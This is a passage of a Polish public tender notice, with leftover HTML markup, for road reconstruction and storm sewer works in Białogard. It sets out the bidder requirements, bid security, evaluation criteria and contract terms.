                Zamawiający wymaga od wykonawców wskazania w ofercie lub we wniosku o dopuszczenie do udziału w postępowaniu imion i nazwisk osób wykonujących czynności przy realizacji zamówienia wraz z informacją o kwalifikacjach zawodowych lub doświadczeniu tych osób:
                
                  nie
                <br />
                Informacje dodatkowe:
                Zamawiający wymaga aby w wykazie robót wskazano, która z wymienionych osób pełniła będzie funkcję kierownika budowy, ponadto od osób tych wymagane jest minimum 3-letnie doświadczenie zawodowe (liczone od dnia uzyskania uprawnień) 
w kierowaniu robotami danej specjalności, przy czym zasadą jest, że nakładające się 
na siebie okresy kierowania robotami nie sumują się. Warunek zostanie uznany za spełniony również wtedy, gdy Wykonawca dysponował będzie osobą, która łącznie posiadać będzie uprawnienia oraz doświadczenie, o którym mowa powyżej.

UWAGA! Wykonawca składający ofertę na więcej niż jedną część musi spełnić warunek zdolności technicznej 
i zawodowej dla sumy części (oferta na zadanie nr 1 i nr 2 = wykonanie dwóch robót polegających na budowie lub przebudowie drogi obejmującej wykonanie nawierzchni bitumicznej wraz z podbudową i budowę/przebudowę infrastruktury technicznej w postaci instalacji sanitarnych o wartości nie niższej niż 300 tys. PLN brutto każda, a także dwóch robót polegających na budowie lub przebudowie drogi obejmującej wykonanie nawierzchni z kostki betonowo-brukowej wraz z podbudową i budowę/przebudowę infrastruktury technicznej w postaci instalacji sanitarnych o wartości nie niższej niż 200 tys. PLN brutto każda). W zakresie dysponowania osobami warunek nie podlega sumowaniu  należy dysponować po jednej osobie 
z danymi uprawnieniami. Warunek zostanie uznany za spełniony również wtedy, gdy Wykonawca dysponował będzie osobą, która łącznie posiadać będzie uprawnienia oraz doświadczenie, o którym mowa powyżej.</div><b>
                III.2) PODSTAWY WYKLUCZENIA
              </b><br /><div style="padding-left: 20px"><b>III.2.1) Podstawy wykluczenia określone w art. 24 ust. 1  ustawy Pzp</b><br /><b>III.2.2) Zamawiający przewiduje wykluczenie wykonawcy na podstawie art. 24 ust. 5 ustawy Pzp</b>
                  tak
                  <br />
                  Zamawiający przewiduje następujące fakultatywne podstawy wykluczenia:
                <br />
                  (podstawa wykluczenia określona w art. 24 ust. 5 pkt 1 ustawy Pzp)
                <br />
                  (podstawa wykluczenia określona w art. 24 ust. 5 pkt 8 ustawy Pzp)
                <br /></div><b>
                III.3) WYKAZ OŚWIADCZEŃ SKŁADANYCH PRZEZ WYKONAWCĘ W CELU WSTĘPNEGO POTWIERDZENIA, ŻE NIE PODLEGA ON WYKLUCZENIU ORAZ SPEŁNIA WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ SPEŁNIA KRYTERIA SELEKCJI
              </b><br /><div style="padding-left: 20px"><b>
                  Oświadczenie o niepodleganiu wykluczeniu oraz spełnianiu warunków udziału w postępowaniu
                </b><br />
                  tak
                <br /><b>
                  Oświadczenie o spełnianiu kryteriów selekcji
                </b><br />
                  nie
                </div><b>
                III.4) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW , SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 3 USTAWY PZP:
              </b><br /><div style="padding-left: 20px">1. zaświadczenia właściwego naczelnika urzędu skarbowego potwierdzającego, że Wykonawca  nie zalega z opłacaniem podatków, wystawionego nie wcześniej niż 3 miesiące przed upływem terminu składania ofert, lub innego dokumentu potwierdzającego, że Wykonawca zawarł porozumienie z właściwym organem podatkowym w sprawie spłat tych należności wraz z ewentualnymi odsetkami lub grzywnami, w szczególności uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu; 2. zaświadczenia właściwej terenowej jednostki organizacyjnej Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego albo innego dokumentu potwierdzającego, że Wykonawca nie zalega z opłacaniem składek na ubezpieczenia społeczne lub zdrowotne wystawionego nie wcześniej niż 3 miesiące przed upływem terminu składania ofert, lub innego dokumentu potwierdzającego, że Wykonawca zawarł porozumienie z właściwym organem w sprawie spłat tych należności wraz z ewentualnymi odsetkami lub grzywnami, w szczególności uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu; 3. odpisu z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, 4. oświadczenia Wykonawcy o niezaleganiu z opłacaniem podatków i opłat lokalnych, o których mowa w ustawie z dnia 12 stycznia 1991 r. o podatkach i opłatach lokalnych (Dz. U. z 2016 r. poz. 716), według załącznika nr 6 do SIWZ; 

Jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, zamiast dokumentów, o których mowa w pkt 1-3 składa dokument lub dokumenty wystawione  w kraju, w którym ma siedzibę lub miejsce zamieszkania, potwierdzające odpowiednio, że: nie zalega z opłacaniem podatków, opłat, składek na ubezpieczenie społeczne lub zdrowotne albo że zawarł porozumienie z właściwym organem w sprawie spłat tych należności wraz z ewentualnymi odsetkami lub grzywnami, w szczególności uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu, wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania ofert; nie otwarto jego likwidacji ani nie ogłoszono upadłości, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.6. Jeżeli w kraju miejsca zamieszkania osoby lub w kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się dokumentów, o których mowa w pkt 1-3 zastępuje się je dokumentem zawierającym odpowiednio oświadczenie Wykonawcy, ze wskazaniem osoby albo osób uprawnionych do jego reprezentacji, lub oświadczenie osoby, której dokument miał dotyczyć, złożone przed notariuszem lub przed organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego właściwym ze względu na siedzibę lub miejsce zamieszkania Wykonawcy lub miejsce zamieszkania 
tej osoby. 

</div><b>
                III.5) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 1 USTAWY PZP
              </b><br /><div style="padding-left: 20px"><b>III.5.1) W ZAKRESIE SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU:</b><br />5. wykazu osób, skierowanych przez Wykonawcę do realizacji zamówienia publicznego, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, uprawnień, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia publicznego, a także zakresu wykonywanych przez nie czynności oraz informacją o podstawie do dysponowania tymi osobami, według załącznika nr 8 do SIWZ, 6. oświadczenia na temat wykształcenia i kwalifikacji zawodowych Wykonawcy lub kadry kierowniczej, wg załącznika nr 9 do SIWZ, 7. Dokumenty dotyczące podmiotu trzeciego wskazane w pkt 1-4, w celu wykazania braku istnienia wobec nich podstaw wykluczenia oraz spełnienia warunków udziału  postępowaniu, w zakresie, w jakim Wykonawca powołuje się na zasoby podmiotu trzeciego.8. wykazu robót budowlanych wykonanych nie wcześniej niż w okresie ostatnich 5 lat przed upływem terminu składania ofert w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju, wartości, daty, miejsca wykonania i podmiotów, na rzecz których roboty te zostały wykonane, według załącznika nr 7a do SIWZ  dla części nr 1  i załącznika nr 7b do SIWZ  dla części nr 2 i/lub części nr 3, z załączeniem dowodów określających czy te roboty budowlane zostały wykonane należycie, w szczególności informacji o tym czy roboty zostały wykonane zgodnie z przepisami prawa budowlanego i prawidłowo ukończone. Zamawiający żąda przedstawienia w wykazie jedynie robót budowlanych, które potwierdzą spełnienie warunku wiedzy i doświadczenia w niniejszym postępowaniu. Dowodami potwierdzającymi czy roboty budowlane zostały wykonane należycie są referencje bądź inne dokumenty wystawione przez podmiot, na rzecz którego roboty budowlane były wykonywane, a jeżeli z uzasadnionej przyczyny o obiektywnym charakterze Wykonawca nie jest w stanie uzyskać tych dokumentów  inne dokumenty, 9. informacji banku lub spółdzielczej kasy oszczędnościowo-kredytowej potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową Wykonawcy, wystawioną nie wcześniej niż 1 miesiąc przed upływem terminu składania ofert; Wykonawca powołujący się na potencjał podmiotu trzeciego w zakresie spełniania warunku finansowego zobowiązany jest przedłożyć informację, o której mowa powyżej dotyczącą tego podmiotu.<br /><b>III.5.2) W ZAKRESIE KRYTERIÓW SELEKCJI:</b><br /></div><b>
                III.6) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 2 USTAWY PZP
              </b><br /><div style="padding-left: 20px"></div><b>
                III.7) INNE DOKUMENTY NIE WYMIENIONE W pkt III.3) - III.6)
              </b><div style="padding-left: 20px">Dokumenty dotyczące podmiotu trzeciego, w celu wykazania braku istnienia wobec nich podstaw wykluczenia oraz spełnienia warunków udziału postępowaniu, w zakresie, w jakim Wykonawca powołuje się na zasoby podmiotu trzeciego.
Wykonawca w terminie 3 dni od dnia zamieszczenia na stronie internetowej informacji z otwarcia ofert, o której mowa w art. 86 ust. 5 ustawy Pzp, jest zobowiązany do przekazania Zamawiającemu w formie pisemnej lub elektronicznej opatrzonej bezpiecznym podpisem kwalifikowanym, oświadczenia o przynależności lub braku przynależności do tej samej grupy kapitałowej, o której mowa w art. 24 ust. 1 pkt 23 ustawy Pzp. Wraz ze złożeniem oświadczenia, Wykonawca może przedstawić dowody, że powiązania z innym Wykonawcą nie prowadzą do zakłócenia konkurencji w postępowaniu o udzielenie zamówienia. Wzór oświadczenia stanowi załącznik nr 5 do SIWZ.</div></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA IV: PROCEDURA
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><b>IV.1) OPIS </b><br /><b>IV.1.1) Tryb udzielenia zamówienia: </b>
                przetarg nieograniczony
              <br /><b>IV.1.2) Zamawiający żąda wniesienia wadium:</b><div style="padding-left: 20px">
                  tak,
                  <br />
                  Informacja na temat wadium
                  <br />Wykonawca jest zobowiązany do wniesienia wadium przed upływem terminu składania ofert
w wysokości: 
DLA CZĘŚCI NR 1  W WYSOKOŚCI 10.000,00 PLN, 
DLA CZĘŚCI NR 2  W WYSOKOŚCI 7.000,00 PLN,
DLA CZĘŚCI NR 3  W WYSOKOŚCI 5.000,00 PLN.
Wadium wypłacone zostanie nieodwołalnie i bezwarunkowo na pierwsze żądanie Zamawiającego 
w przypadku zaistnienia okoliczności, o których mowa w art. 46 ust. 4a i 5 ustawy Pzp. 
Wadium można wnieść w jednej z następujących form: 	
pieniądzu;
poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej, z tym 
że poręczenie kasy jest zawsze poręczeniem pieniężnym;
gwarancjach bankowych;
gwarancjach ubezpieczeniowych;
poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 
9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz.U. z 2016, poz.  359).
Wadium w pieniądzu należy wpłacić przelewem na konto Zamawiającego: Bank Spółdzielczy w Białogardzie 85 8562 0007 0003 4308 2000 0040 z adnotacją wadium w postępowaniu nr IZP.271.1.1.2017, CZĘŚĆ NR  . 
Dowodem wniesienia wadium może być potwierdzony odcinek wpłaty lub potwierdzony przez bank odcinek polecenia dokonania przelewu lub potwierdzony przez Wykonawcę inny dokument potwierdzający dokonanie wpłaty kwoty wadium załączony do oferty. 
Wadium musi być wpłacone na tyle wcześnie, aby w terminie składania ofert kwota wadium znajdowała się na rachunku bankowym Zamawiającego.
W przypadku wadium wnoszonego w innych formach niż pieniądz, należy oryginał dokumentu złożyć wrazz ofertą. 
W przypadku składania przez Wykonawcę wadium w formie gwarancji lub poręczenia, dokument powinien być sporządzony zgodnie z obowiązującym prawem i winien zawierać następujące elementy: 
nazwę dającego zlecenie (Wykonawcy), beneficjenta gwarancji-poręczenia (Zamawiającego), gwaranta-poręczyciela (instytucji udzielających gwarancji-poręczenia) oraz wskazanie ich siedzib, 
określenie wierzytelności, która ma być zabezpieczona gwarancją-poręczeniem, 
kwotę gwarancji-poręczenia, 
termin ważności gwarancji-poręczenia, 
zobowiązanie gwaranta-poręczyciela do zapłacenia kwoty gwarancji-poręczenia na pierwsze pisemne żądanie Zamawiającego zawierające oświadczenie, iż Wykonawca, którego ofertę wybrano: 
odmówił podpisania umowy na warunkach określonych we ofercie, lub 
nie wniósł zabezpieczenia należytego wykonania umowy, lub 
zawarcie umowy stało się niemożliwe z przyczyn leżących po stronie Wykonawcy.
zobowiązanie gwaranta-poręczyciela do: zapłacenia kwoty gwarancji-poręczenia jeżeli Wykonawca 
w odpowiedzi na wezwanie, o którym mowa w art. 26 ust. 3 i 3a ustawy Pzp, z przyczyn leżących po jego stronie, nie złożył oświadczeń lub dokumentów potwierdzających okoliczności, o których mowa w art. 25 ust. 1 ustawy Pzp, oświadczenia, o którym mowa w art. 25a ust. 1 ustawy Pzp, pełnomocnictw lub nie wyraził zgody na poprawienie omyłki, o której mowa w art. 87 ust. 2 pkt 3 ustawy Pzp, co spowodowało brak możliwości wybrania oferty złożonej przez Wykonawcę jako najkorzystniejszej.
Zwrot wadium nastąpi zgodnie z przepisem art. 46  ust. 1 lub 1a ustawy Pzp. 
Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli Wykonawca w odpowiedzi na wezwanie, 
o którym mowa w art. 26 ust. 3 i 3a ustawy Pzp, z przyczyn leżących po jego stronie, nie złożył oświadczeń lub dokumentów potwierdzających okoliczności, o których mowa w art. 25 ust. 1 ustawy Pzp, oświadczenia,   o którym mowa w art. 25a ust 1 ustawy Pzp, pełnomocnictw lub nie wyraził zgody na poprawienie omyłki,      o której mowa w art. 87 ust. 2 pkt 3 ustawy Pzp, co spowodowało brak możliwości wybrania oferty złożonej przez Wykonawcę jako najkorzystniejszej. 
Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli Wykonawca, którego oferta została wybrana: odmówił podpisania umowy w sprawie zamówienia publicznego na warunkach określonych w ofercie; nie wniósł wymaganego zabezpieczenia należytego wykonania umowy; zawarcie umowy w sprawie zamówienia publicznego stało się niemożliwe z przyczyn leżących 
po stronie Wykonawcy.
Jeżeli wadium wniesiono w pieniądzu, Zamawiający zwraca je wraz z odsetkami wynikającymi z umowy rachunku bankowego, na którym było ono przechowywane, pomniejszone o koszty prowadzenia rachunku bankowego oraz prowizji bankowej za przelew pieniędzy na rachunek bankowy wskazany przez Wykonawcę.

</div><br /><b>IV.1.3) Przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b><div style="padding-left: 20px">
                  nie
                </div><br /><b>
                IV.1.4) Wymaga się złożenia ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych:
              </b><div style="padding-left: 20px">
                  nie
                <br />
                Dopuszcza się złożenie ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /></div><br /><b>
                IV.1.5.) Wymaga się złożenia oferty wariantowej:
              </b><div style="padding-left: 20px">
                  nie
                <br />
                Dopuszcza się złożenie oferty wariantowej
                <br />
                  nie
                <br />
                Złożenie oferty wariantowej dopuszcza się tylko z jednoczesnym złożeniem oferty zasadniczej:
                <br />
                  nie
                </div><br /><b>
                IV.1.6) Przewidywana liczba wykonawców, którzy zostaną zaproszeni do udziału w postępowaniu
              </b><br /><i>
                (przetarg ograniczony, negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne)
              </i><div style="padding-left: 20px">
                Liczba wykonawców  <br />
                Przewidywana minimalna liczba wykonawców  <br />
                Maksymalna liczba wykonawców  <br />
                Kryteria selekcji wykonawców:
                <br /></div><br /><b>
                IV.1.7) Informacje na temat umowy ramowej lub dynamicznego systemu zakupów:
              </b><div style="padding-left: 20px">
                Umowa ramowa będzie zawarta:
                <br /><br />
                Czy przewiduje się ograniczenie liczby uczestników umowy ramowej:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /><br />
                Zamówienie obejmuje ustanowienie dynamicznego systemu zakupów:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /><br />
                W ramach umowy ramowej/dynamicznego systemu zakupów dopuszcza się złożenie ofert w formie katalogów elektronicznych:
                <br />
                  nie
                <br />
                Przewiduje się pobranie ze złożonych katalogów elektronicznych informacji potrzebnych do sporządzenia ofert w ramach umowy ramowej/dynamicznego systemu zakupów:
                <br />
                  nie
                </div><br /><b>IV.1.8) Aukcja elektroniczna </b><br /><b>
                Przewidziane jest przeprowadzenie aukcji elektronicznej </b><i>(przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem) </i>
                nie
              <br /><b>Należy wskazać elementy, których wartości będą przedmiotem aukcji elektronicznej: </b><br /><b>Przewiduje się ograniczenia co do przedstawionych wartości, wynikające z opisu przedmiotu zamówienia:</b><br />
                nie
              <br />

              
                Należy podać, które informacje zostaną udostępnione wykonawcom w trakcie aukcji elektronicznej oraz jaki będzie  termin ich udostępnienia:
              
              <br />
              Informacje dotyczące przebiegu aukcji elektronicznej: 
              <br />
              Jaki jest przewidziany sposób postępowania w toku aukcji elektronicznej i jakie będą warunki, na jakich wykonawcy będą mogli licytować (minimalne wysokości postąpień): 
              <br />
              Informacje dotyczące wykorzystywanego sprzętu elektronicznego, rozwiązań i specyfikacji technicznych w zakresie połączeń:
              <br />
              Wymagania dotyczące rejestracji i identyfikacji wykonawców w aukcji elektronicznej: 
              <br />


              Informacje o liczbie etapów aukcji elektronicznej i czasie ich trwania: 
              <div style="padding-left: 20px">
                  Aukcja wieloetapowa
                  <table><tr><td>etap nr</td><td>czas trwania etapu</td></tr><tr><td></td><td></td></tr></table><br />
                Czy wykonawcy, którzy nie złożyli nowych postąpień, zostaną zakwalifikowani do następnego etapu:
                
                  nie
                <br />
                Warunki zamknięcia aukcji elektronicznej:
                <br /></div><br /><b>IV.2) KRYTERIA OCENY OFERT </b><br /><b>IV.2.1) Kryteria oceny ofert: </b><br /><b>IV.2.2) Kryteria</b><br /><div style="padding-left: 20px"><table><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>Cena</td><td>60</td></tr><tr><td>Termin gwarancji </td><td>24</td></tr><tr><td>Zatrudnienie na podstawie umowy o pracę</td><td>16</td></tr></table></div><br /><b>IV.2.3) Zastosowanie procedury, o której mowa w art. 24aa ust. 1 ustawy Pzp </b>(przetarg nieograniczony)
              <br />
                tak
              <br /><b>IV.3) Negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne </b><br /><b>IV.3.1) Informacje na temat negocjacji z ogłoszeniem</b><br />
              Minimalne wymagania, które muszą spełniać wszystkie oferty:
              <br /><br />
              Przewidziane jest zastrzeżenie prawa do udzielenia zamówienia na podstawie ofert wstępnych bez przeprowadzenia negocjacji
              
                nie
              <br />
              Przewidziany jest podział negocjacji na etapy w celu ograniczenia liczby ofert:
              
                nie
              <br />
              Należy podać informacje na temat etapów negocjacji (w tym liczbę etapów):
              <br /><br />
              Informacje dodatkowe
              <br /><br /><br /><b>IV.3.2) Informacje na temat dialogu konkurencyjnego</b><br />
              Opis potrzeb i wymagań zamawiającego lub informacja o sposobie uzyskania tego opisu:
              <br /><br />
              Informacja o wysokości nagród dla wykonawców, którzy podczas dialogu konkurencyjnego przedstawili rozwiązania stanowiące podstawę do składania ofert, jeżeli zamawiający przewiduje nagrody:
              <br /><br />
              Wstępny harmonogram postępowania:
              <br /><br />
              Podział dialogu na etapy w celu ograniczenia liczby rozwiązań:
              
                nie
              <br />
              Należy podać informacje na temat etapów dialogu:
              <br /><br /><br />
              Informacje dodatkowe:
              <br /><br /><b>IV.3.3) Informacje na temat partnerstwa innowacyjnego</b><br />
              Elementy opisu przedmiotu zamówienia definiujące minimalne wymagania, którym muszą odpowiadać wszystkie oferty:
              <br /><br />
              Podział negocjacji na etapy w celu ograniczeniu liczby ofert podlegających negocjacjom poprzez zastosowanie kryteriów oceny ofert wskazanych w specyfikacji istotnych warunków zamówienia:
              <br />
                nie
              <br />
              Informacje dodatkowe:
              <br /><br /><b>IV.4) Licytacja elektroniczna  </b><br />
              Adres strony internetowej, na której będzie prowadzona licytacja elektroniczna:
              <br /><div style="padding-left: 20px"></div>

              Adres strony internetowej, na której jest dostępny opis przedmiotu zamówienia w licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div>

              Wymagania dotyczące rejestracji i identyfikacji wykonawców w licytacji elektronicznej, w tym wymagania techniczne urządzeń informatycznych:
              <br /><div style="padding-left: 20px"></div>

              Sposób postępowania w toku licytacji elektronicznej, w tym określenie minimalnych wysokości postąpień:
              <br /><div style="padding-left: 20px"></div>

              Informacje o liczbie etapów licytacji elektronicznej i czasie ich trwania: 
              <div style="padding-left: 20px">
                  Licytacja wieloetapowa
                  <table><tr><td>etap nr</td><td>czas trwania etapu</td></tr><tr><td></td><td></td></tr></table><br />
                Wykonawcy, którzy nie złożyli nowych postąpień, zostaną  zakwalifikowani do następnego etapu:
                
                  nie
                </div>

              Termin otwarcia licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div>

              Termin i warunki zamknięcia licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div><br />
              Istotne dla stron postanowienia, które zostaną wprowadzone do treści zawieranej umowy w sprawie zamówienia publicznego, albo ogólne warunki umowy, albo wzór umowy:
              <br /><div style="padding-left: 20px"></div><br />
              Wymagania dotyczące zabezpieczenia należytego wykonania umowy: 
              <br /><div style="padding-left: 20px"></div><br />
              Informacje dodatkowe:
              <br /><div style="padding-left: 20px"></div><b>IV.5) ZMIANA UMOWY</b><br /><b>Przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy:</b>
                tak

                <br />
                Należy wskazać zakres, charakter zmian oraz warunki wprowadzenia zmian:
                <br />Zamawiający przewiduje możliwość istotnych zmian postanowień umowy w stosunku do treści oferty, na  podstawie której dokonano wyboru Wykonawcy, w następujących przypadkach: wystąpienia okoliczności skutkujących koniecznością zmiany terminu realizacji umowy o taką ilość dni, w jakiej wystąpiły wskazane okoliczności oraz usuwanie ich skutków, w związku z: koniecznością wprowadzenia zmian w dokumentacji projektowej, a wynikających z konieczności dostosowania zakresu zadania do powszechnie obowiązujących przepisów prawa, brakiem możliwości prowadzenia robót na skutek warunków klimatycznych: (gwałtowne opady deszczu, gradobicie, śnieżyce, powodzie i inne anomalia klimatyczne) uniemożliwiające prowadzenie robót budowlanych, przeprowadzanie prób (sprawdzeń), dokonanie odbiorów, przez okres powyżej 4 dni, działaniem siły wyższej w rozumieniu przepisów Kodeksu cywilnego, nieterminowym, z przyczyn niezależnych od Wykonawcy, przekazaniem przez Zamawiającego terenu budowy Wykonawcy, wstrzymaniem prac budowlanych przez właściwy organ z przyczyn niezależnych od Wykonawcy, innymi okolicznościami niepowstałymi z winy Wykonawcy (koniecznością wykonania robót dodatkowych; koniecznością wykonania robót przez innego Wykonawcę w miejscu wykonywania prac budowlanych), zmiany osób wykonujących zamówienie, o których mowa w § 7 ust. 2 i 4 wzoru umowy  w sytuacji kiedy wymiana ta będzie spowodowana przyczynami losowymi, niezależnymi od Wykonawcy, a leżącymi po stronie tych osób. Osoby zastępujące osoby wskazane w ofercie przetargowej muszą spełniać warunek zdolności technicznej lub zawodowej określony w SIWZ, zwiększenia liczby osób wykonujących zamówienie, o których mowa w § 7 ust. 2 i 4 wzoru umowy  w sytuacji kiedy zmiana ta będzie konieczna do prawidłowego (np. terminowego) wykonania przedmiotu zamówienia. Wskazane osoby muszą spełniać warunek zdolności technicznej lub zawodowej określony w SIWZ, zmniejszenia liczby osób wykonujących zamówienie, o których mowa w § 7 ust. 2 i 4 wzoru umowy  w sytuacji kiedy zmiana ta będzie spowodowana przyczynami losowymi niezależnymi od Wykonawcy, a warunek zdolności technicznej lub zawodowej określony w SIWZ, będzie spełniony. Zmiany umowy wymagają dla swej ważności formy pisemnej pod rygorem nieważności.<br /><b>IV.6) INFORMACJE ADMINISTRACYJNE </b><br /><br /><b>IV.6.1) Sposób udostępniania informacji o charakterze poufnym </b><i>(jeżeli dotyczy): </i><br /><br /><b>Środki służące ochronie informacji o charakterze poufnym</b><br /><br /><b>IV.6.2) Termin składania ofert lub wniosków o dopuszczenie do udziału w postępowaniu: </b><br />
              Data: 03/02/2017, godzina: 09:00,
              <br />
              Skrócenie terminu składania wniosków, ze względu na pilną potrzebę udzielenia zamówienia (przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem):
              <br />
                nie
              <br />
              Wskazać powody:
              <br /><br />
              Język lub języki, w jakich mogą być sporządzane oferty lub wnioski o dopuszczenie do udziału w postępowaniu
              <br />&gt;
              polski<br /><b>IV.6.3) Termin związania ofertą: </b>
                okres w dniach: 30 (od ostatecznego terminu składania ofert)
              <br /><b>IV.6.4) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia:</b>
                nie
              <br /><b>IV.6.5) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, jeżeli środki służące sfinansowaniu zamówień na badania naukowe lub prace rozwojowe, które zamawiający zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia, nie zostały mu przyznane</b>
                nie
              <br /><b>IV.6.6) Informacje dodatkowe:</b><br /></div></div><div class="headerLarge_xforms" style="text-align: center"><u>
                ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH
              </u></div><div><b>Część nr: </b>1
                  
                <b>Nazwa: </b>przebudowa ulicy Polnej w Białogardzie wraz z budową kanalizacji deszczowej <br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>Część nr 1 - przebudowa ulicy Polnej w Białogardzie wraz z budową kanalizacji deszczowej -  roboty drogowe  i kanalizacyjne: roboty pomiarowe, roboty ziemne koparką z transportem, mechaniczne profilowanie i zagęszczenie gruntu rodzimego, ława betonowa z oporem z betonu,,krawężnik betonowy uliczny, obrzeża betonowe, warstwa odsączająca z pospółki pod chodnik, warstwa odsączająca pod jezdnię, podbudowa z kruszywa łamanego pod jezdnię, podbudowa zasadnicza z betonu asfaltowego, geosiatka na skropionej podbudowie, warstwa wiążąca z asfaltobetonu żwirowo-grysowego, warstwa ścieralna, nawierzchnia z kostki betonowej, ściek terenowy z kostki betonowej, regulacja wysokościowa studni rewizyjnych, regulacja kominów zasuw wodociągowych, odtworzenie trasy i punktów wysokościowych, rozebranie nawierzchni bitumicznej, rozebranie podbudowy z kruszywa łamanego, wykopy pod rurociąg i studnie, zasypanie piaskiem, warstwa odsączająca z pospółki, podbudowa z kruszywa łamanego, podbudowa z masy mineralno-bitumicznej, geosiatka o wytrzymałości na rozciąganie, warstwa wiążąca z asfaltobetonu, warstwa ścieralna, podłoże pod kanały z materiałów sypkich z zagęszczeniem, rurociągi ciśnieniowe z rur PCV, studnie rewizyjne kanalizacji deszczowej, studnie uliczne z osadnikiem bez syfonu z kratą żeliwną uchylną, próba szczelności kanałów rurowych, trójnik do połączenia wpustu.<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>45111200-0, 45233200-1,
                    45231100-6<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  <br />
                  Waluta:
                  <br /><div style="padding-left: 20px"><br /><b>4) Czas trwania lub termin wykonania: </b>
                      data rozpoczęcia: 15/05/2017<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>Cena </td><td>60</td></tr><tr><td>Termin gwarancji</td><td>24</td></tr><tr><td>Zatrudnienie na podstawie umowy o pracę</td><td>16</td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b>Roboty towarzyszące oraz tymczasowe, nie objęte dokumentacją projektową i przedmiarem robót, konieczne  do uwzględnienia przy ww. częściach: uporządkowanie terenu objętego zamówieniem, zabezpieczenie mediów (woda, energia elektryczna, itp.), wykonanie dokumentacji powykonawczej, oznakowanie i zabezpieczenie terenu, na którym wykonywane będą roboty budowlane, opracowanie projektu tymczasowej organizacji ruchu.
